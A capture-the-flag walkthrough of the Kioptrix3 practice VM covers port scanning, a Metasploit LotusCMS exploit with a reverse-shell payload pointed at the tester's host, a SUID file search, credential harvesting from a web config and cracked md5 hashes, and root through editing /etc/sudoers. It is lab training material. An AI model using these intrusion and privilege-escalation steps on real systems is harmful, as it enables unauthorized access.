Code name: Kioptrix3
VM Download: www.kioptrix.com/dlvm/KVM3.rar
Challange: Get root on the system
First of all, let’s see wich ports are open.
# nmap -p- -Pn -A 192.168.11.11
Port 80 open, as usual, let’s browse it
Ligoat? Uhm, we can dig a litle deeper.
jackpot! So LotusCMS huh..
We can search that on some exploit databases such as metasploit or the exploit db to see if we can find something useful.
msf > search lotus
Exploit found? Lets try this one
msf > set RHOST 192.168.11.11
msf > set URI /
We can also set the payload and edit it’s options
msf > set LHOST 192.168.11.7
msf > set LPORT 8723
And then just run the exploit
msf > exploit
Now we are in, but our shell is not privileged, we must try to find a way to escalate our privileges on the system. One way to do that is to find some special files that can always be run as the (user)owner, the (group)owner or the (directory)owner. We can perform a search to look for files that are always executed as the user owner with:
$ find / -perm -u=s -type f 2>/dev/null
And we found an interesting one, /usr/local/bin/ht
But if we try to open it from our shell…
Damn, we will need a full interective shell for that. ssh will do the job, but we need to find a valid user and it’s password… we need to dig deeper in the system.
After a quick research, we found that on the web public directory. As the webapp works with php-mysql, we can find the mysql db admin password stored in plain text inside the webapp configuration file!
Nice! Now we can try to log in with these credentials, we can log into phpmyadmin as we found it using nikto
After looking inside the database’s tables, we found 2 interesting entries
Looks like passwords are stored using md5, we can decrypt it using some public md5 hash database
Password found, now we can login via ssh
We are in, now that we got a full interactive shell, we can go back and execute ht
Looks like a text editor, as we are running it with root privileges, we can try to open or edit some interesting file. 2 interesting files can be /etc/sudoers and /etc/shadow
After opening the file, we can edit it.
I’ve edited /etc/sudoers and granted all privileges on the user loneferret. Now we can just run
# sudo su
And get root